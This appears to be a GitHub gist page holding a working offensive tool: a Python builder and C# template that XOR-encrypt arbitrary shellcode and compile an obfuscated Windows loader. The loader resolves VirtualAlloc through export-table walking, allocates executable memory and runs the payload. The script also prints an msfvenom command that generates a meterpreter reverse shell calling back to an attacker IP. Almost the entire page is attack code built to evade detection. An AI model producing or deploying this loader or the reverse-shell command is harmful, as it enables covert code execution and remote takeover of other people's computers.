-
-
Save snovvcrash/35773330434e738bd86155894338ba4f to your computer and use it in GitHub Desktop.
Dynamic shellcode runner based on @xpn's example: https://blog.xpnsec.com/weird-ways-to-execute-dotnet/
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env python3 | |
import re, os, sys | |
from random import randint, choices | |
from string import ascii_lowercase, ascii_uppercase, digits | |
def xor(input, key): | |
output = [] | |
for i in range(len(input)): | |
try: | |
c = ord(input[i]) | |
except TypeError: | |
c = input[i] | |
k = key[i % len(key)] | |
output.append(c ^ ord(k)) | |
return f'{{ 0x{",0x".join(hex(x)[2:] for x in output)} }};' | |
def get_random_string(n): | |
while True: | |
s = ''.join(choices(ascii_lowercase + ascii_uppercase + digits, k=n)) | |
if not s[0].isdigit(): | |
return s | |
print(''' _ | |
___| |_ ___ _ _ ___ ___ ___ ___ | |
|_ -| | _| | | | | -_| _| | |
|___|_|_|_| |___|_|_|_|_|___|_| | |
Shellcode Runner by @snovvcrash\n''') | |
with open('template.cs', 'r') as fd: | |
template = fd.read() | |
try: | |
with open('shellcode.bin', 'rb') as fd: | |
shellcode = fd.read() | |
except FileNotFoundError: | |
print("[-] No 'shellcode.bin' file found!") | |
print('[*] Example: msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.13.37 LPORT=443 EXITFUNC=thread -f raw -o shellcode.bin') | |
sys.exit(1) | |
print("[*] Encrypting shellcode.bin bytes") | |
key = get_random_string(randint(8, 12)) | |
template = re.sub('BUF;', f'byte[] VAR032 = new byte[{len(shellcode)}] {xor(shellcode, key)}', template) | |
template = re.sub('BUF_KEY', key, template) | |
print("[*] Encrypting 'kernel32.dll' string") | |
key = get_random_string(randint(8, 12)) | |
template = re.sub('KERNEL32;', xor('kernel32.dll', key), template) | |
template = re.sub('KERNEL32_KEY', key, template) | |
print("[*] Encrypting 'VirtualAlloc' string") | |
key = get_random_string(randint(8, 12)) | |
template = re.sub('VIRTUALALLOC;', xor('VirtualAlloc', key), template) | |
template = re.sub('VIRTUALALLOC_KEY', key, template) | |
print("[*] Randomizing variable names") | |
for i in range(999): | |
var = get_random_string(randint(5, 9)) | |
template = re.sub(f'VAR{str(i).zfill(3)}', var, template) | |
if i == 117: | |
namespace = var | |
with open('shrunner.cs', 'w') as fd: | |
fd.write(template) | |
cmd = 'mono-csc /t:winexe /out:shrunner.exe shrunner.cs' | |
print(f"[*] Compiling with '{cmd}'") | |
if os.system(cmd) == 0: | |
print('[+] Done!') | |
print(f'[*] Entrypoint: {namespace},Program,Main') | |
#os.remove('shrunner.cs') | |
os.system('file shrunner.exe') | |
else: | |
print('[-] Compilation failed, probably Mono is not installed :(') | |
print('[*] Install with: sudo apt install mono-devel') |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
using System; | |
using System.Text; | |
using System.Diagnostics; | |
using System.Runtime.InteropServices; | |
namespace VAR117 | |
{ | |
public class Program | |
{ | |
[UnmanagedFunctionPointer(CallingConvention.Winapi)] | |
delegate IntPtr VAR001(IntPtr VAR002, uint VAR003, uint VAR004, uint VAR005); | |
[UnmanagedFunctionPointer(CallingConvention.Winapi)] | |
delegate IntPtr VAR006(); | |
static IntPtr VAR007(IntPtr VAR008, string VAR009) | |
{ | |
var VAR010 = Marshal.PtrToStructure<VAR011>(VAR008); | |
var VAR012 = Marshal.PtrToStructure<VAR013>(VAR008 + VAR010.VAR014 + 4 + Marshal.SizeOf<VAR015>()); | |
var VAR016 = Marshal.PtrToStructure<VAR017>(VAR008 + (int)VAR012.VAR018.VAR019); | |
for (int VAR020 = 0; VAR020 < VAR016.VAR021; VAR020++) | |
{ | |
var VAR022 = Marshal.ReadInt32(VAR008 + (int)VAR016.VAR023 + (VAR020 * 4)); | |
var VAR024 = Marshal.PtrToStringAnsi(VAR008 + (int)VAR022); | |
if (VAR024 == VAR009) | |
{ | |
var VAR025 = Marshal.ReadInt32(VAR008 + (int)VAR016.VAR026 + (VAR020 * 4)); | |
return VAR008 + (int)VAR025; | |
} | |
} | |
return IntPtr.Zero; | |
} | |
static string VAR027(byte[] VAR028, string VAR029) | |
{ | |
var VAR030 = new StringBuilder(); | |
for (int VAR020 = 0; VAR020 < VAR028.Length; VAR020++) | |
VAR030.Append((char)((uint)VAR028[VAR020] ^ (uint)VAR029[VAR020 % VAR029.Length])); | |
return VAR030.ToString(); | |
} | |
static byte[] VAR031(byte[] VAR032, string VAR029) | |
{ | |
var VAR030 = new byte[VAR032.Length]; | |
for (int VAR020 = 0; VAR020 < VAR032.Length; VAR020++) | |
VAR030[VAR020] = (byte)(VAR032[VAR020] ^ (byte)VAR029[VAR020 % VAR029.Length]); | |
return VAR030; | |
} | |
public static void Main() | |
{ | |
BUF; | |
var VAR033 = VAR031(VAR032, "BUF_KEY"); | |
byte[] VAR118 = KERNEL32; | |
var VAR119 = VAR027(VAR118, "KERNEL32_KEY"); | |
byte[] VAR034 = VIRTUALALLOC; | |
var VAR009 = VAR027(VAR034, "VIRTUALALLOC_KEY"); | |
IntPtr VAR035 = IntPtr.Zero; | |
foreach (ProcessModule VAR036 in Process.GetCurrentProcess().Modules) | |
if (VAR036.ModuleName.ToLower() == VAR119) | |
VAR035 = VAR007(VAR036.BaseAddress, VAR009); | |
var VAR037 = Marshal.GetDelegateForFunctionPointer<VAR001>(VAR035); | |
var VAR038 = VAR037(IntPtr.Zero, (uint)VAR033.Length, 0x3000, 0x40); | |
Marshal.Copy(VAR033, 0, VAR038, VAR033.Length); | |
var VAR039 = Marshal.GetDelegateForFunctionPointer<VAR006>(VAR038); | |
VAR039(); | |
} | |
#region Structs | |
[StructLayout(LayoutKind.Sequential, Pack = 1)] | |
struct VAR013 | |
{ | |
public UInt16 VAR040; | |
public Byte VAR041; | |
public Byte VAR042; | |
public UInt32 VAR043; | |
public UInt32 VAR044; | |
public UInt32 VAR045; | |
public UInt32 VAR046; | |
public UInt32 VAR047; | |
public UInt64 VAR048; | |
public UInt32 VAR049; | |
public UInt32 VAR050; | |
public UInt16 VAR051; | |
public UInt16 VAR052; | |
public UInt16 VAR053; | |
public UInt16 VAR054; | |
public UInt16 VAR055; | |
public UInt16 VAR056; | |
public UInt32 VAR057; | |
public UInt32 VAR058; | |
public UInt32 VAR059; | |
public UInt32 VAR060; | |
public UInt16 VAR061; | |
public UInt16 VAR062; | |
public UInt64 VAR063; | |
public UInt64 VAR064; | |
public UInt64 VAR065; | |
public UInt64 VAR066; | |
public UInt32 VAR067; | |
public UInt32 VAR068; | |
public VAR084 VAR018; | |
public VAR084 VAR069; | |
public VAR084 VAR070; | |
public VAR084 VAR071; | |
public VAR084 VAR072; | |
public VAR084 VAR073; | |
public VAR084 VAR074; | |
public VAR084 VAR075; | |
public VAR084 VAR076; | |
public VAR084 VAR077; | |
public VAR084 VAR078; | |
public VAR084 VAR079; | |
public VAR084 VAR080; | |
public VAR084 VAR081; | |
public VAR084 VAR082; | |
public VAR084 VAR083; | |
} | |
[StructLayout(LayoutKind.Sequential)] | |
struct VAR084 | |
{ | |
public UInt32 VAR019; | |
public UInt32 VAR085; | |
} | |
[StructLayout(LayoutKind.Sequential)] | |
struct VAR017 | |
{ | |
public UInt32 VAR086; | |
public UInt32 VAR087; | |
public UInt16 VAR088; | |
public UInt16 VAR089; | |
public UInt32 VAR090; | |
public UInt32 VAR091; | |
public UInt32 VAR092; | |
public UInt32 VAR021; | |
public UInt32 VAR026; | |
public UInt32 VAR023; | |
public UInt32 VAR093; | |
} | |
[StructLayout(LayoutKind.Sequential, Pack = 1)] | |
struct VAR015 | |
{ | |
public UInt16 VAR094; | |
public UInt16 VAR095; | |
public UInt32 VAR087; | |
public UInt32 VAR096; | |
public UInt32 VAR097; | |
public UInt16 VAR098; | |
public UInt16 VAR086; | |
} | |
[StructLayout(LayoutKind.Sequential)] | |
struct VAR011 | |
{ | |
[MarshalAs(UnmanagedType.ByValArray, SizeConst = 2)] | |
public char[] VAR099; | |
public UInt16 VAR100; | |
public UInt16 VAR101; | |
public UInt16 VAR102; | |
public UInt16 VAR103; | |
public UInt16 VAR104; | |
public UInt16 VAR105; | |
public UInt16 VAR106; | |
public UInt16 VAR107; | |
public UInt16 VAR108; | |
public UInt16 VAR109; | |
public UInt16 VAR110; | |
public UInt16 VAR111; | |
public UInt16 VAR112; | |
[MarshalAs(UnmanagedType.ByValArray, SizeConst = 4)] | |
public UInt16[] VAR113; | |
public UInt16 VAR114; | |
public UInt16 VAR115; | |
[MarshalAs(UnmanagedType.ByValArray, SizeConst = 10)] | |
public UInt16[] VAR116; | |
public Int32 VAR014; | |
} | |
#endregion | |
} | |
} |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment